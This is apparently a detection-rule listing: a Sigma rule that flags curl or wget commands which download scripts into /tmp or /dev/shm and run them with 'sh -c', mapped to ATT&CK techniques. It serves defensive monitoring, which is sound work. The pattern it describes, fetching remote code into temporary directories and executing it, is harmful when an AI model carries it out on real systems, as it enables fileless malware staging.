Techniques
Sample rules
Suspicious Download and Execute Pattern via Curl/Wget
- source: sigma
- technicques:
- t1059
- t1059.004
- t1203
Description
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
Detection logic
condition: all of selection_*
selection_downloader:
CommandLine|contains:
- /curl
- /wget
selection_executor:
CommandLine|contains: sh -c
selection_tmp:
CommandLine|contains:
- /tmp/
- /dev/shm/